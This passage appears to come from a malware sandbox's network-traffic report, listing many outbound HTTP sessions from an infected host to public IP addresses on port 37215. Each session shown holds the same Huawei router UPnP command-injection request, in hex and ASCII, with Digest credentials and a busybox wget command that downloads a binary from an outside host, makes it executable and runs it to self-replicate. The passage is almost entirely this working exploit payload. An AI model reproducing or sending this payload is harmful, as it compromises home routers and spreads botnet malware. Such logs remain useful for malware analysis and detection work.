3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2136192.168.2.1355322157.28.208.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722079039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2137192.168.2.1336044197.209.87.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722093105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2138192.168.2.1343702157.196.249.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722110987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2139192.168.2.1347454157.49.162.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722129107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2140192.168.2.1344378157.72.238.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722161055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2141192.168.2.133700641.201.235.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722186089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2142192.168.2.1351780157.149.175.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.722273111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2143192.168.2.135106462.243.98.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725328922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2144192.168.2.1360724157.80.177.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725384951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2145192.168.2.1348514197.171.114.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725402117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2146192.168.2.1351276219.96.243.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.725419044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
